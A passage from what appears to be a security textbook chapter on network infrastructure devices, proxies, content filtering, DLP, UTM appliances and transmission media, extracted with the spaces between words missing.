designedtoconnecttelephonesintothelocalphonesystem.Basicallydigitalswitchingsystems,theycanbecompromisedfromtheoutsideandusedbyphonehackers(phreakers)tomakephonecallsatthebusiness’sexpense.Althoughthistypeofhackinghasdecreasedasthecostoflong-distancecallinghasdecreased,ithasnotgoneaway,andasseveralfirmslearneveryyear,voicemailboxesandPBXscanbecompromisedandthelong-distancebillscangetveryhigh,veryfast.
TechTip
CoexistingCommunicationsDataandvoicecommunicationshavecoexistedinenterprisesfordecades.RecentconnectionsinsidetheenterpriseofVoiceoverIP(VoIP)andtraditionalprivatebranchexchange(PBX)solutionsincreasebothfunctionalityandsecurityrisks.Specificfirewallstoprotectagainstunauthorizedtrafficovertelephonyconnectionsareavailabletocountertheincreasedrisk.
AnotherproblemwithPBXsariseswhentheyareinterconnectedtothedatasystems,eitherbycorporateconnectionorbyroguemodemsinthehandsofusers.Ineithercase,apathexistsforconnectiontooutsidedatanetworksandtheInternet.Justasafirewallisneededforsecurityondataconnections,oneisneededfortheseconnectionsaswell.TelecommunicationsfirewallsareadistincttypeoffirewalldesignedtoprotectboththePBXandthedataconnections.Thefunctionalityofatelecommunicationsfirewallisthesameasthatofadatafirewall:itistheretoenforcesecuritypolicies.Telecommunicationsecuritypoliciescanbeenforcedeventocoverhoursofphoneuse,topreventunauthorizedlong-distanceusagethroughtheimplementationofaccesscodesand/orrestrictedservicehours.
VPNConcentratorAvirtualprivatenetwork(VPN)isaconstructusedtoprovideasecure
communicationchannelbetweenusersacrosspublicnetworkssuchastheInternet.ThemostcommonimplementationofVPNisviaIPsec,aprotocolforIPsecurity.IPsecismandatedinIPv6andisoptionalinIPv4.IPseccanbeimplementedinhardware,software,oracombinationofbothandisusedtoencryptallIPtraffic.InChapter11,avarietyoftechniquesaredescribedthatcanbeemployedtoinstantiateaVPNconnection.Theuseofencryptiontechnologiesallowseitherthedatainapackettobeencryptedortheentirepackettobeencrypted.Ifthedataisencrypted,thepacketheadercanstillbesniffedandobservedbetweensourceanddestination,buttheencryptionprotectsthecontentsofthepacketfrominspection.Iftheentirepacketisencrypted,itisthenplacedintoanotherpacketandsentviatunnelacrossthepublicnetwork.Tunnelingcanprotecteventheidentityofthecommunicatingparties.
ExamTip:AVPNconcentratorisahardwaredevicedesignedtoactasaVPNendpoint,managingVPNconnectionstoanenterprise.
SecurityDevicesTherearearangeofsecuritydevicesthatcanbeemployedatthenetworklayertoinstantiatesecurityfunctionalityinthenetworklayer.Devicescanbeusedforintrusiondetection,networkaccesscontrol,andawiderangeofothersecurityfunctions.Eachdevicehasaspecificnetworkfunctionandplaysaroleinmaintainingnetworkinfrastructuresecurity.
IntrusionDetectionSystemsIntrusiondetectionsystems(IDSs)areanimportantelementofinfrastructuresecurity.IDSsaredesignedtodetect,log,andrespondtounauthorizednetworkorhostuse,bothinrealtimeandafterthefact.IDSs
areavailablefromawideselectionofvendorsandareanessentialpartofacomprehensivenetworksecurityprogram.Thesesystemsareimplementedusingsoftware,butinlargenetworksorsystemswithsignificanttrafficlevels,dedicatedhardwareistypicallyrequiredaswell.IDSscanbedividedintotwocategories:network-basedsystemsandhost-basedsystems.
CrossCheckIntrusionDetectionFromanetworkinfrastructurepointofview,network-basedIDSscanbeconsideredpartofinfrastructure,whereashost-basedIDSsaretypicallyconsideredpartofacomprehensivesecurityprogramandnotnecessarilyinfrastructure.Twoprimarymethodsofdetectionareused:signature-basedandanomaly-based.IDSsarecoveredindetailinChapter13.
NetworkAccessControlNetworkscompriseconnectedworkstationsandservers.Managingsecurityonanetworkinvolvesmanagingawiderangeofissues,fromvariousconnectedhardwareandthesoftwareoperatingthesedevices.Assumingthatthenetworkissecure,eachadditionalconnectioninvolvesrisk.Managingtheendpointsonacase-by-casebasisastheyconnectisasecuritymethodologyknownasnetworkaccesscontrol.Twomaincompetingmethodologiesexistthatdealwithnetworkaccesscontrol:NetworkAccessProtection(NAP)isaMicrosofttechnologyforcontrollingnetworkaccessofacomputerhost,andNetworkAdmissionControl(NAC)isCisco’stechnologyforcontrollingnetworkadmission.
TechTip
NACandNAPInteroperabilityAlthoughMicrosoft’sNAPandCisco’sNACappeartobecompetingmethodologies,theyare
infactcomplementary.NAPallowsmuchfiner-graincontrolforWindows-baseddevices,whileNACisamoregeneral-purposemethodologyforcontrollingadmissionthroughedgedevices.Recognizinghowtheycanworktogether,MicrosoftandCiscohavedeployedguidesonhowtocombinethesetwosystems,preservingtheadvantagesandinvestmentsineach.
Microsoft’sNAPsystemisbasedonmeasuringthesystemhealthoftheconnectingmachine,includingpatchlevelsoftheOS,antivirusprotection,andsystempolicies.TheobjectivebehindNAPistoenforcepolicyandgovernancestandardsonnetworkdevicesbeforetheyarealloweddata-levelaccesstoanetwork.NAPwasfirstutilizedinWindowsXPServicePack3,WindowsVista,andWindowsServer2008,anditrequiresadditionalinfrastructureserverstoimplementthehealthchecks.Thesystemincludesenforcementagentsthatinterrogateclientsandverifyadmissioncriteria.AdmissioncriteriacanincludeclientmachineID,statusofupdates,andsoforth.UsingNAP,networkadministratorscandefinegranularlevelsofnetworkaccessbasedonmultiplecriteria;whoaclientis,whatgroupsaclientbelongsto,andthedegreetowhichthatclientiscompliantwithcorporateclienthealthrequirements.ThesehealthrequirementsincludeOSupdates,antivirusupdates,andcriticalpatches.Responseoptionsincluderejectionoftheconnectionrequestorrestrictionofadmissiontoasubnet.NAPalsoprovidesamechanismforautomaticremediationofclienthealthrequirementsandrestorationofnormalaccesswhenhealthy.Cisco’sNACsystemisbuiltaroundanappliancethatenforcespolicies
chosenbythenetworkadministrator.Aseriesofthird-partysolutionscaninterfacewiththeappliance,allowingtheverificationofmanydifferentoptions,includingclientpolicysettings,softwareupdates,andclientsecurityposture.Theuseofthird-partydevicesandsoftwaremakesthisanextensiblesystemacrossawiderangeofequipment.BothCiscoNACandMicrosoftNAPareintheirearlystagesof
widespreadimplementation,withonlylargeenterprisestypicallytakingthesesteps.Althoughtheyhavebeenavailableforover5years,theyarenotbeingembracedacrossmostfirms.Theconceptofautomatedadmissioncheckingbasedonclientdevicecharacteristicsisheretostay,as
itprovidestimelycontrolintheever-changingnetworkworldoftoday’senterprises.
NetworkMonitoring/DiagnosticAcomputernetworkitselfcanbeconsideredalargecomputersystem,withperformanceandoperatingissues.Justasacomputerneedsmanagement,monitoring,andfaultresolution,sodonetworks.SNMPwasdevelopedtoperformthisfunctionacrossnetworks.Theideaistoenableacentralmonitoringandcontrolcentertomaintain,configure,andrepairnetworkdevices,suchasswitchesandrouters,aswellasothernetworkservices,suchasfirewalls,IDSs,andremoteaccessservers.SNMPhassomesecuritylimitations,andmanyvendorshavedevelopedsoftwaresolutionsthatsitontopofSNMPtoprovidebettersecurityandbettermanagementtoolsuites.
SNMP,SimpleNetworkManagementProtocol,isapartoftheInternetProtocolsuiteofprotocols.Itisanopenstandard,designedfortransmissionofmanagementfunctionsbetweendevices.DonotconfusethiswithSMTP,SimpleMailTransferProtocol,whichisusedtotransfermailbetweenmachines.
Theconceptofanetworkoperationscenter(NOC)comesfromtheoldphonecompanynetworkdays,whencentralmonitoringcentersmonitoredthehealthofthetelephonenetworkandprovidedinterfacesformaintenanceandmanagement.Thissameconceptworkswellwithcomputernetworks,andcompanieswithmidsizeandlargernetworksemploythesamephilosophy.TheNOCallowsoperatorstoobserveandinteractwiththenetwork,usingtheself-reportingand,insomecases,self-healingnatureofnetworkdevicestoensureefficientnetworkoperation.Althoughgenerallyaboringoperationundernormalconditions,whenthingsstarttogowrong,asinthecaseofavirusorwormattack,theNOC
canbecomeabusyandstressfulplaceasoperatorsattempttoreturnthesystemtofullefficiencywhilenotinterruptingexistingtraffic.Asnetworkscanbespreadoutliterallyaroundtheworld,itisnot
feasibletohaveapersonvisiteachdeviceforcontrolfunctions.SoftwareenablescontrollersatNOCstomeasuretheactualperformanceofnetworkdevicesandmakechangestotheconfigurationandoperationofdevicesremotely.Theabilitytomakeremoteconnectionswiththisleveloffunctionalityisbothablessingandasecurityissue.Althoughthisallowsefficientnetworkoperationsmanagement,italsoprovidesanopportunityforunauthorizedentryintoanetwork.Forthisreason,avarietyofsecuritycontrolsareused,fromsecondarynetworkstoVPNsandadvancedauthenticationmethodswithrespecttonetworkcontrolconnections.Networkmonitoringisanongoingconcernforanysignificantnetwork.
Inadditiontomonitoringtrafficflowandefficiency,monitoringofsecurity-relatedeventsisnecessary.IDSsactmerelyasalarms,indicatingthepossibilityofabreachassociatedwithaspecificsetofactivities.Theseindicationsstillneedtobeinvestigatedandanappropriateresponseneedstobeinitiatedbysecuritypersonnel.Simpleitemssuchasportscansmaybeignoredbypolicy,butanactualunauthorizedentryintoanetworkrouter,forinstance,wouldrequireNOCpersonneltotakespecificactionstolimitthepotentialdamagetothesystem.Inanysignificantnetwork,coordinatingsystemchanges,dynamicnetworktrafficlevels,potentialsecurityincidents,andmaintenanceactivitiesisadauntingtaskrequiringnumerouspersonnelworkingtogether.Softwarehasbeendevelopedtohelpmanagetheinformationflowrequiredtosupportthesetasks.Suchsoftwarecanenableremoteadministrationofdevicesinastandardfashion,sothatthecontrolsystemscanbedevisedinahardwarevendor–neutralconfiguration.SNMPisthemainstandardembracedbyvendorstopermit
interoperability.AlthoughSNMPhasreceivedalotofsecurity-relatedattentionoflateduetovarioussecurityholesinitsimplementation,itisstillanimportantpartofasecuritysolutionassociatedwithnetworkinfrastructure.Manyusefultoolshavesecurityissues;thekeyisto
understandthelimitationsandtousethetoolswithincorrectboundariestolimittheriskassociatedwiththevulnerabilities.Blinduseofanytechnologywillresultinincreasedrisk,andSNMPisnoexception.Properplanning,setup,anddeploymentcanlimitexposuretovulnerabilities.Continuousauditingandmaintenanceofsystemswiththelatestpatchesisanecessarypartofoperationsandisessentialtomaintainingasecureposture.
LoadBalancersCertainsystems,suchasservers,aremorecriticaltobusinessoperationsandshouldthereforebetheobjectoffault-tolerancemeasures.Loadbalancersaredesignedtodistributetheprocessingloadovertwoormoresystems.Theyareusedtohelpimproveresourceutilizationandthroughputbutalsohavetheaddedadvantageofincreasingthefaulttoleranceoftheoverallsystemsinceacriticalprocessmaybesplitacrossseveralsystems.Shouldanyonesystemfail,theotherscanpickuptheprocessingitwashandling.
ProxiesProxiesservetomanageconnectionsbetweensystems,actingasrelaysforthetraffic.Proxiescanfunctionatthecircuitlevel,wheretheysupportmultipletraffictypes,ortheycanbeapplication-levelproxies,whicharedesignedtorelayspecificapplicationtraffic.AnHTTPproxycanmanageanHTTPconversationasitunderstandsthetypeandfunctionofthecontent.Application-specificproxiescanserveassecuritydevicesiftheyareprogrammedwithspecificrulesdesignedtoprovideprotectionagainstundesiredcontent.Thoughnotstrictlyasecuritytool,aproxyserver(orsimplyproxy)can
beusedtofilteroutundesirabletrafficandpreventemployeesfromaccessingpotentiallyhostilewebsites.Aproxyservertakesrequestsfromaclientsystemandforwardsthemtothedestinationserveronbehalfofthe
client,asshowninFigure10.8.Proxyserverscanbecompletelytransparent(theseareusuallycalledgatewaysortunnelingproxies),oraproxyservercanmodifytheclientrequestbeforesendingiton,orevenservetheclient’srequestwithoutneedingtocontactthedestinationserver.Severalmajorcategoriesofproxyserversareinuse:
•Figure10.8HTTPproxyhandlingclientrequestsandwebserverresponses
AnonymizingproxyAnanonymizingproxyisdesignedtohideinformationabouttherequestingsystemandmakeauser’swebbrowsingexperience“anonymous.”Thistypeofproxyserviceisoften
usedbyindividualswhoareconcernedabouttheamountofpersonalinformationbeingtransferredacrosstheInternetandtheuseoftrackingcookiesandothermechanismstotrackbrowsingactivity.
CachingproxyThistypeofproxykeepslocalcopiesofpopularclientrequestsandisoftenusedinlargeorganizationstoreducebandwidthusageandincreaseperformance.Whenarequestismade,theproxyserverfirstcheckstoseewhetherithasacurrentcopyoftherequestedcontentinthecache;ifitdoes,itservicestheclientrequestimmediatelywithouthavingtocontactthedestinationserver.Ifthecontentisoldorthecachingproxydoesnothaveacopyoftherequestedcontent,therequestisforwardedtothedestinationserver.
Content-filteringproxyContent-filteringproxiesexamineeachclientrequestandcompareittoanestablishedacceptableusepolicy(AUP).Requestscanusuallybefilteredinavarietyofways,includingbytherequestedURL,destinationsystem,ordomainnameorbykeywordsinthecontentitself.Content-filteringproxiestypicallysupportuser-levelauthentication,soaccesscanbecontrolledandmonitoredandactivitythroughtheproxycanbeloggedandanalyzed.Thistypeofproxyisverypopularinschools,corporateenvironments,andgovernmentnetworks.
OpenproxyAnopenproxyisessentiallyaproxythatisavailabletoanyInternetuserandoftenhassomeanonymizingcapabilitiesaswell.Thistypeofproxyhasbeenthesubjectofsomecontroversy,withadvocatesforInternetprivacyandfreedomononesideoftheargument,andlawenforcement,corporations,andgovernmententitiesontheotherside.Asopenproxiesareoftenusedtocircumventcorporateproxies,manycorporationsattempttoblocktheuseofopenproxiesbytheiremployees.
ReverseproxyAreverseproxyistypicallyinstalledontheserversideofanetworkconnection,ofteninfrontofagroupofwebservers.Thereverseproxyinterceptsallincomingwebrequestsandcanperformanumberoffunctions,includingtrafficfilteringandshaping,SSL
decryption,servingofcommonstaticcontentsuchasgraphics,andperformingloadbalancing.
WebproxyAwebproxyissolelydesignedtohandlewebtrafficandissometimescalledawebcache.Mostwebproxiesareessentiallyspecializedcachingproxies.
ExamTip:Aproxyserverisasystemorapplicationthatactsasago-betweenforclients’requestsfornetworkservices.Theclienttellstheproxyserverwhatitwantsand,iftheclientisauthorizedtohaveit,theproxyserverconnectstotheappropriatenetworkserviceandgetstheclientwhatitaskedfor.Webproxiesarethemostcommonlydeployedtypeofproxyserver.
Deployingaproxysolutionwithinanetworkenvironmentisusuallydoneeitherbysettinguptheproxyandrequiringallclientsystemstoconfiguretheirbrowserstousetheproxyorbydeployinganinterceptingproxythatactivelyinterceptsallrequestswithoutrequiringclient-sideconfiguration.Fromasecurityperspective,proxiesaremostusefulintheirabilityto
controlandfilteroutboundrequests.Bylimitingthetypesofcontentandwebsitesemployeescanaccessfromcorporatesystems,manyadministratorshopetoavoidlossofcorporatedata,hijackedsystems,andinfectionsfrommaliciouswebsites.AdministratorsalsouseproxiestoenforcecorporateAUPsandtrackuseofcorporateresources.Mostproxiescanbeconfiguredtoeitheralloworrequireindividualuserauthentication—thisgivesthemtheabilitytologandcontrolactivitybasedonspecificusersorgroups.Forexample,anorganizationmightwanttoallowthehumanresourcesgrouptobrowseFacebookduringbusinesshoursbutnotallowtherestoftheorganizationtodoso.
WebSecurityGatewaysSomesecurityvendorscombineproxyfunctionswithcontent-filtering
functionstocreateaproductcalledawebsecuritygateway.Websecuritygatewaysareintendedtoaddressthesecuritythreatsandpitfallsuniquetoweb-basedtraffic.Websecuritygatewaystypicallyprovidethefollowingcapabilities:
Real-timemalwareprotection(a.k.a.malwareinspection)Theabilitytoscanalloutgoingandincomingwebtraffictodetectandblockundesirabletrafficsuchasmalware,spyware,adware,maliciousscripts,file-basedattacks,andsoon.
ContentmonitoringTheabilitytomonitorthecontentofwebtrafficbeingexaminedtoensurethatitcomplieswithorganizationalpolicies.
ProductivitymonitoringTheabilitytomeasuretypesandquantitiesofwebtrafficthatisbeinggeneratedbyspecificusers,groupsofusers,ortheentireorganization.
DataprotectionandcomplianceScanningwebtrafficforsensitiveorproprietaryinformationbeingsentoutsideoftheorganizationaswellastheuseofsocialnetworksitesorinappropriatesites.
InternetContentFiltersWiththedramaticproliferationofInternettrafficandthepushtoprovideInternetaccesstoeverydesktop,manycorporationshaveimplementedcontent-filteringsystems,calledanInternetcontentfilter,toprotectthemfromemployees’viewingofinappropriateorillegalcontentattheworkplaceandthesubsequentcomplicationsthatoccurwhensuchviewingtakesplace.Internetcontentfilteringisalsopopularinschools,libraries,homes,governmentoffices,andanyotherenvironmentwherethereisaneedtolimitorrestrictaccesstoundesirablecontent.Inadditiontofilteringundesirablecontent,suchaspornography,somecontentfilterscanalsofilteroutmaliciousactivitysuchasbrowserhijackingattemptsorXSSattacks.Inmanycases,contentfilteringisperformedwithorasapartofaproxysolutionasthecontentrequestscanbefilteredandservicedby
thesamedevice.Contentcanbefilteredinavarietyofways,includingviatherequestedURL,thedestinationsystem,thedomainname,bykeywordsinthecontentitself,andbytypeoffilerequested.
Theterm“Internetcontentfilter”or“contentfilter”isappliedtoanydevice,application,orsoftwarepackagethatexaminesnetworktraffic(especiallywebtraffic)forundesirableorrestrictedcontent.AcontentfiltercouldbeasoftwarepackageloadedonaspecificPCoranetworkappliancecapableoffilteringanentireorganization’swebtraffic.
Content-filteringsystemsfacemanychallenges,becausetheever-changingInternetmakesitdifficulttomaintainlistsofundesirablesites(sometimecalledblacklists);termsusedonamedicalsitecanalsobeusedonapornographicsite,makingkeywordfilteringchallenging;anddeterminedusersarealwaysseekingwaystobypassproxyfilters.Tohelpadministrators,mostcommercialcontent-filteringsolutionsprovideanupdateservice,muchlikeIDSorantivirusproductsthatupdateskeywordsandundesirablesitesautomatically.
DataLossPreventionDatalossprevention(DLP)referstotechnologyemployedtodetectandpreventtransfersofdataacrossanenterprise.Employedatkeylocations,DLPtechnologycanscanpacketsforspecificdatapatterns.Thistechnologycanbetunedtodetectaccountnumbers,secrets,specificmarkers,orfiles.Whenspecificdataelementsaredetected,thesystemcanblockthetransfer.TheprimarychallengeinemployingDLPtechnologiesistheplacementofthesensor.TheDLPsensorneedstobeableobservethedata,soifthechannelisencrypted,DLPtechnologycanbethwarted.
UnifiedThreatManagementManysecurityvendorsoffer“all-in-onesecurityappliances,”whichare
devicesthatcombinemultiplefunctionsintothesamehardwareappliance.Mostcommonlythesefunctionsarefirewall,IDS/IPS,andantivirus,althoughall-in-oneappliancescanincludeVPNcapabilities,antispam,maliciouswebtrafficfiltering,antispyware,contentfiltering,trafficshaping,andsoon.All-in-oneappliancesareoftensoldasbeingcheaper,easiertomanage,andmoreefficientthanhavingseparatesolutionsthataccomplisheachofthefunctionstheall-in-oneapplianceiscapableofperforming.Acommonnamefortheseall-in-oneappliancesisaunifiedthreatmanagement(UTM)appliance.UsingaUTMsolutionsimplifiesthesecurityactivityasasingletask,underacommonsoftwarepackageforoperations.Thisreducesthelearningcurvetoasingletoolratherthanacollectionoftools.AUTMsolutioncanhavebetterintegrationandefficienciesinhandlingnetworktrafficandincidentsthanacollectionoftoolsconnectedtogether.Figure10.9illustratestheadvantagesofUTMprocessing.Ratherthan
processingelementsinalinearfashion,asshownin10.9a,thepacketsareprocessedinaparallelizedfashion(b).Thereisaneedtocoordinatebetweentheelementsandmanymodernsolutionsdothiswithparallelizedhardware.
•Figure10.9Unifiedthreatmanagementarchitecture
URLFilteringURLfiltersblockconnectionstowebsitesthatareinaprohibitedlist.TheuseofaUTMappliance,typicallybackedbyaservicetokeepthelistofprohibitedwebsitesupdated,providesanautomatedmeanstoblockaccesstositesdeemeddangerousorinappropriate.Becauseofthehighlyvolatilenatureofwebcontent,automatedenterprise-levelprotectionisneededtoensureareasonablechanceofblockingsourcesofinappropriate
content,malware,andothermaliciouscontent.
ContentInspectionInsteadofjustrelyingonaURLtodeterminetheacceptabilityofcontent,UTMappliancescanalsoinspecttheactualcontentbeingserved.Contentinspectionisusedtofilterwebrequeststhatreturncontentwithspecificcomponents,suchasnamesofbodyparts,musicorvideocontent,andothercontentthatisinappropriateforthebusinessenvironment.
MalwareInspectionMalwareisanotheritemthatcanbedetectedduringnetworktransmission,andUTMappliancescanbetunedtodetectmalware.Network-basedmalwaredetectionhastheadvantageofhavingtoupdateonlyasinglesystemasopposedtoallmachines.
MediaThebaseofcommunicationsbetweendevicesisthephysicallayeroftheOSImodel.Thisisthedomainoftheactualconnectionbetweendevices,whetherbywire,fiber,orradiofrequencywaves.Thephysicallayerseparatesthedefinitionsandprotocolsrequiredtotransmitthesignalphysicallybetweenboxesfromhigher-levelprotocolsthatdealwiththedetailsofthedataitself.Fourcommonmethodsareusedtoconnectequipmentatthephysicallayer:
Coaxialcable
Twisted-paircable
Fiber-optics
Wireless
CoaxialCableCoaxialcableisfamiliartomanyhouseholdsasamethodofconnectingtelevisionstoVCRsortosatelliteorcableservices.Itisusedbecauseofitshighbandwidthandshieldingcapabilities.Comparedtostandardtwisted-pairlinessuchastelephonelines,coaxialcable(“coax”)ismuchlesspronetooutsideinterference.Itisalsomuchmoreexpensivetorun,bothfromacost-per-footmeasureandfromacable-dimensionmeasure.Coaxcostsmuchmoreperfootthanstandardtwisted-pairwiresandcarriesonlyasinglecircuitforalargewirediameter.
•Acoaxconnector
AnoriginaldesignspecificationforEthernetconnections,coaxwasusedfrommachinetomachineinearlyEthernetimplementations.Theconnectorswereeasytouseandensuredgoodconnections,andthelimiteddistanceofmostofficeLANsdidnotcarryalargecostpenalty.Today,almostallofthisolderEthernetspecificationhasbeenreplacedbyfaster,cheapertwisted-pairalternatives,andtheonlyplaceyou’relikelytoseecoaxinadatanetworkisfromthecableboxtothecablemodem.
•Atypical8-wireUTPline
Becauseofitsphysicalnature,itispossibletodrillaholethroughtheouterpartofacoaxcableandconnecttothecenterconnector.Thisiscalleda“vampiretap”andisaneasymethodtogetaccesstothesignalanddatabeingtransmitted.
UTP/STPTwisted-pairwireshaveallbutcompletelyreplacedcoaxialcablesinEthernetnetworks.Twisted-pairwiresusethesametechnologyusedbythephonecompanyforthemovementofelectricalsignals.Singlepairsoftwistedwiresreduceelectricalcrosstalkandelectromagneticinterference.Multiplegroupsoftwistedpairscanthenbebundledtogetherincommongroupsandeasilywiredbetweendevices.
•Atypical8-wireSTPline
•AbundleofUTPwires
Twistedpairscomeintwotypes,shieldedandunshielded.Shieldedtwisted-pair(STP)hasafoilshieldaroundthepairstoprovideextrashieldingfromelectromagneticinterference.Unshieldedtwisted-pair(UTP)reliesonthetwisttoeliminateinterference.UTPhasacostadvantageoverSTPandisusuallysufficientforconnections,exceptinverynoisyelectricalareas.
Twisted-pairlinesarecategorizedbythelevelofdatatransmissiontheycansupport.Threecurrentcategoriesareinuse:
Category3(Cat3)Minimumforvoiceand10-MbpsEthernet.Category5(Cat5/Cat5e)For100-MbpsFastEthernet;Cat5eisanenhancedversionoftheCat5specificationtoaddressfar-endcrosstalkandissuitablefor1000Mbps.
Category6(Cat6/Cat6a)For10-GigabitEthernetovershortdistances;Cat6aisusedforlonger,upto100m,10-Gbpscables.
Thestandardmethodforconnectingtwisted-paircablesisviaan8-pinconnector,calledanRJ-45connectorthatlookslikeastandardphonejackconnectorbutisslightlylarger.Oneniceaspectoftwisted-paircablingisthatit’seasytospliceandchangeconnectors.ManyanetworkadministratorhasmadeEthernetcablesfromstockCat-5wire,twoconnectors,andacrimpingtool.Thiseaseofconnectionisalsoasecurityissue;becausetwisted-paircablesareeasytospliceinto,rogueconnectionsforsniffingcouldbemadewithoutdetectionincableruns.Bothcoaxandfiberaremuchmoredifficulttosplicebecauseeachrequiresataptoconnect,andtapsareeasiertodetect.
FiberFiber-opticcableusesbeamsoflaserlighttoconnectdevicesoverathinglasswire.Thebiggestadvantagetofiberisitsbandwidth,withtransmissioncapabilitiesintotheterabitspersecondrange.Fiber-opticcableisusedtomakehigh-speedconnectionsbetweenserversandisthebackbonemediumoftheInternetandlargenetworks.Forallofitsspeedandbandwidthadvantages,fiberhasonemajordrawback—cost.Thecostofusingfiberisatwo-edgedsword.Whenmeasuredby
bandwidth,usingfiberischeaperthanusingcompetingwiredtechnologies.Thelengthofrunsoffibercanbemuchlonger,andthedatacapacityoffiberismuchhigher.Butconnectionstoafiberaredifficult
andexpensive,andfiberisimpossibletosplice.Makingthepreciseconnectionontheendofafiber-opticlineisahighlyskilledjobandisdonebyspeciallytrainedprofessionalswhomaintainalevelofproficiency.Oncetheconnectorisfittedontheend,severalformsofconnectorsandblocksareused,asshownintheimagesabove.
•Atypeoffiberterminator
•Atypicalfiber-opticfiber,terminator,andconnectorblock
Splicingfiberispracticallyimpossible;thesolutionistoaddconnectorsandconnectthrougharepeater.Thisaddstothesecurityoffiberinthatunauthorizedconnectionsareallbutimpossibletomake.Thehighcostofconnectionstofiberandthehighercostoffiberperfootalsomakeitlessattractiveforthefinalmileinpublicnetworkswhereusersareconnectedtothepublicswitchingsystems.Forthisreason,cablecompaniesusecoaxandDSLprovidersusetwisted-pairtohandlethe“lastmile”scenario.
UnguidedMedia
Electromagneticwaveshavebeentransmittedtoconveysignalsliterallysincetheinceptionofradio.Unguidedmediaisaphraseusedtocoveralltransmissionmedianotguidedbywire,fiber,orotherconstraints;itincludesradiofrequency,infrared,andmicrowavemethods.Unguidedmediahaveoneattributeincommon:theyareunguidedandassuchcantraveltomanymachinessimultaneously.Transmissionpatternscanbemodulatedbyantennas,butthetargetmachinecanbeoneofmanyinareceptionzone.Assuch,securityprinciplesareevenmorecritical,astheymustassumethatunauthorizedusershaveaccesstothesignal.
InfraredInfrared(IR)isabandofelectromagneticenergyjustbeyondtheredendofthevisiblecolorspectrum.IRhasbeenusedinremote-controldevicesforyears.IRmadeitsdebutincomputernetworkingasawirelessmethodtoconnecttoprinters.Nowthatwirelesskeyboards,wirelessmice,andmobiledevicesexchangedataviaIR,itseemstobeeverywhere.IRcanalsobeusedtoconnectdevicesinanetworkconfiguration,butitisslowcomparedtootherwirelesstechnologies.IRcannotpenetratewallsbutinsteadbouncesoffthem.Norcanitpenetrateothersolidobjects,soifyoustackafewitemsinfrontofthetransceiver,thesignalislost.
RF/MicrowaveTheuseofradiofrequency(RF)wavestocarrycommunicationsignalsgoesbacktothebeginningofthe20thcentury.RFwavesareacommonmethodofcommunicatinginawirelessworld.Theyuseavarietyoffrequencybands,eachwithspecialcharacteristics.ThetermmicrowaveisusedtodescribeaspecificportionoftheRFspectrumthatisusedforcommunicationandothertasks,suchascooking.Point-to-pointmicrowavelinkshavebeeninstalledbymanynetwork
providerstocarrycommunicationsoverlongdistancesandroughterrain.Manydifferentfrequenciesareusedinthemicrowavebandsformanydifferentpurposes.Today,homeuserscanusewirelessnetworkingthroughouttheirhouseandenablelaptopstosurftheWebwhilethey’re
movedaroundthehouse.Corporateusersareexperiencingthesamephenomenon,withwirelessnetworkingenablingcorporateuserstochecke-mailonlaptopswhileridingashuttlebusonabusinesscampus.ThesewirelesssolutionsarecoveredindetailinChapter12.
TechTip
WirelessOptionsTherearenumerousradio-basedalternativesforcarryingnetworktraffic.Theyvaryincapacity,distance,andotherfeatures.CommonlyfoundexamplesareWiFi,WiMAX,ZigBee,Bluetooth,900MHz,andNFC.UnderstandingthesecurityrequirementsassociatedwitheachisimportantandiscoveredinmoredetailinChapter12.
OnekeyfeatureofmicrowavecommunicationsisthatmicrowaveRFenergycanpenetratereasonableamountsofbuildingstructure.Thisallowsyoutoconnectnetworkdevicesinseparaterooms,anditcanremovetheconstraintsonequipmentlocationimposedbyfixedwiring.Anotherkeyfeatureisbroadcastcapability.Byitsnature,RFenergyisunguidedandcanbereceivedbymultipleuserssimultaneously.Microwavesallowmultipleusersaccessinalimitedarea,andmicrowavesystemsareseeingapplicationasthelastmileoftheInternetindensemetropolitanareas.Point-to-multipointmicrowavedevicescandeliverdatacommunicationtoallthebusinessusersinadowntownmetropolitanareathroughrooftopantennas,reducingtheneedforexpensivebuilding-to-buildingcables.Justasmicrowavescarrycellphoneandotherdatacommunications,thesametechnologiesofferamethodtobridgethelast-milesolution.The“lastmile”problemistheconnectionofindividualconsumerstoa
backbone,anexpensivepropositionbecauseofthesheernumberofconnectionsandunsharedlineatthispointinanetwork.Again,costisanissue,astransceiverequipmentisexpensive,butindenselypopulatedareas,suchasapartmentsandofficebuildingsinmetropolitanareas,theuserdensitycanhelpdefrayindividualcosts.Speedoncommercialmicrowavelinkscanexceed10Gbps,sospeedisnotaproblemfor
connectingmultipleusersorforhigh-bandwidthapplications.
RemovableMediaOneconceptcommontoallcomputerusersisdatastorage.Sometimesstorageoccursonafileserverandsometimesitoccursonmovablemedia,allowingittobetransportedbetweenmachines.Movingstoragemediarepresentsasecurityriskfromacoupleofangles,thefirstbeingthepotentiallossofcontroloverthedataonthemovingmedia.Secondistheriskofintroducingunwanteditems,suchasavirusoraworm,whenthemediaareattachedbacktoanetwork.Bothoftheseissuescanberemediedthroughpoliciesandsoftware.Thekeyistoensurethatthepoliciesareenforcedandthesoftwareiseffective.Todescribemedia-specificissues,mediacanbedividedintothreecategories:magnetic,optical,andelectronic.
Removableandtransportablemediamakethephysicalsecurityofthedataamoredifficulttask.Theonlysolutiontothisproblemisencryption,whichiscoveredinChapter5.
MagneticMediaMagneticmediastoredatathroughtherearrangementofmagneticparticlesonanonmagneticsubstrate.Commonformsincludeharddrives,floppydisks,zipdisks,andmagnetictape.Althoughthespecificformatcandiffer,thebasicconceptisthesame.Allthesedevicessharesomecommoncharacteristics:Eachhassensitivitytoexternalmagneticfields.Attachafloppydisktotherefrigeratordoorwithamagnetifyouwanttotestthesensitivity.Theyarealsoaffectedbyhightemperatures,asinfires,andbyexposuretowater.
HardDrivesHarddrivesusedtorequirelargemachinesinmainframes.Nowtheyaresmallenoughtoattachtomobiledevices.Theconceptsremainthesameamongallofthem:aspinningplatterrotatesthemagneticmediabeneathheadsthatreadthepatternsintheoxidecoating.Asdriveshavegottensmallerandrotationspeedshaveincreased,thecapacitieshavealsogrown.Todaygigabytesofdatacanbestoredinadeviceslightlylargerthanabottlecap.Portableharddrivesinthe1TBto3TBrangearenowavailableandaffordable.
•2TBUSBharddrive
Oneofthesecuritycontrolsavailabletohelpprotecttheconfidentialityofthedataisfulldriveencryptionbuiltintothedrivehardware.Usingakeythatiscontrolled,throughaTrustedPlatformModule(TPM)interface
